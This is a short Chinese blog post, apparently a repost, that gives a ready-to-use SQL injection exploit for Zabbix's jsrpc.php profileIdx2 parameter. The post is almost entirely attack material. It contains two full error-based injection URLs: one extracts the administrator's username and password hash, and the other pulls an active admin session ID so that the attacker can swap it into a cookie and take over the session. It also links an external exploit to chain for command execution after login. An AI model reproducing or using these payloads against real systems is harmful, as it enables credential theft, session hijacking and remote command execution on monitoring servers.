Zabbix最新SQL注射漏洞利用
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Zabbix最新SQL注射漏洞利用相关的知识,希望对你有一定的参考价值。
freebuf刚爆Zabbix的sql注入:http://www.freebuf.com/vuls/112197.html
漏洞测试:
爆用户名和密码:
http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get& timestamp =1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=( select (1) from users where 1=1 aNd ( SELECT 1 FROM ( select count (*),concat(floor(rand(0)*2),( substring (( Select ( select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile= true &period=3600&stime=20160817050632&resourcetype=17 |
爆sessionid(可替换刷新登陆--替换cookie中的session id)
http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get& timestamp =1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=( select (1) from users where 1=1 aNd ( SELECT 1 FROM ( select count (*),concat(floor(rand(0)*2),( substring (( Select ( select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile= true &period=3600&stime=20160817050632&resourcetype=17 |
配合这个登录后的命令执行使用https://www.exploit-db.com/exploits/39937/
以上是关于Zabbix最新SQL注射漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章
9.12安全帮每日资讯:Struts2 新漏洞(S2-052)出现利用实例;黑白名单要你何用;黑客可以远程访问医用注射泵